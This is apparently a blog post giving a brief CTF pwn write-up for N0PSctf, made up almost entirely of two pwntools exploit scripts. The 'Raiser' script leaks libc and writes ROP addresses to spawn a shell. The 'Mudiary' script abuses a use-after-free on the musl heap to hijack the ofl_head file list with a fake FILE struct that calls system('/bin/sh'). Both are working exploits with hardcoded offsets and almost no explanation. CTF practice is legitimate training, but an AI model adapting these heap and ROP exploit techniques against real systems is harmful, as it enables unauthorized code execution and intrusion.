N0PSctf Pwn Writeup
|
126
|
0
|
Writeup

闲来无事打个比赛,ctftime上随便挑的一个

Raiser

from pwn import*
r=process(["./sc_Linux_x86_64","nopsctf-3e1fa45a9b0d-raiser-1.chals.io"])
#r=process('./raiser')
context.log_level='debug'

def show(offset):
	r.recvuntil("> ")
	r.sendline("1337")
	r.recvuntil("> ")
	r.sendline(str(offset))

def edit(content):
	r.recvuntil("> ")
	r.sendline(str(content))
	r.recvuntil("> ")
	r.sendline("0")

def exit():
	r.recvuntil("> ")
	r.sendline("0")
	r.recvuntil("> ")
	r.sendline(str(0x2000))

show(29)
r.recvline()
libc_base=int(r.recvline())-0x246000
success("libc_base: "+hex(libc_base))

for i in range(19): edit(0)

edit(libc_base+0x28796)
edit(libc_base+0x28795)
edit(libc_base+0x1c041b)
edit(libc_base+0x552b0)

#gdb.attach(r)

exit()

r.interactive()

Mudiary

from pwn import*
r=process(["./sc_Linux_x86_64","nopsctf-b673cc3ca88b-mudiary-1.chals.io"])
#r=process(['./musl.so','./mudiary'])
context.log_level='debug'

def new(size,content):
	r.recvuntil(": ")
	r.sendline("1")
	r.recvuntil(": ")
	r.sendline(str(size))
	r.recvuntil(": ")
	r.send(content)

def edit(idx,content):
	r.recvuntil(": ")
	r.sendline("2")
	r.recvuntil(": ")
	r.sendline(str(idx))
	r.recvuntil(": ")
	r.sendline(str(len(content)+1))
	r.recvuntil(": ")
	r.send(content)

def show(idx):
	r.recvuntil(": ")
	r.sendline("3")
	r.recvuntil(":")
	r.sendline(str(idx))

def delete(idx):
	r.recvuntil(": ")
	r.sendline("4")
	r.recvuntil(":")
	r.sendline(str(idx))

def exit():
	r.recvuntil(": ")
	r.sendline("1337")

new(0x18,"\n")

delete(0)

show(0)

r.recvuntil("------------------\n")
libc_base=u64(r.recvuntil("\n",drop=True)+p16(0))-0x9ee90
success("libc_base: "+hex(libc_base))

ofl_head=libc_base+0xa1158
system=libc_base+0x4419a

edit(0,p64(ofl_head-0x18)+p64(libc_base+0xa1360)+"\n")

fake_struct="/bin/sh"
fake_struct=fake_struct.ljust(0x28,"\x00")
fake_struct+=p64(0x2)
fake_struct=fake_struct.ljust(0x38,"\x00")
fake_struct+=p64(0x1)
fake_struct=fake_struct.ljust(0x48,"\x00")
fake_struct+=p64(system)

new(0x100,fake_struct+"\n")

for i in range(14): new(0x18,"\n")

#gdb.attach(r,"b close_file")

r.recvuntil(": ")
r.sendline("1")

r.interactive()
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇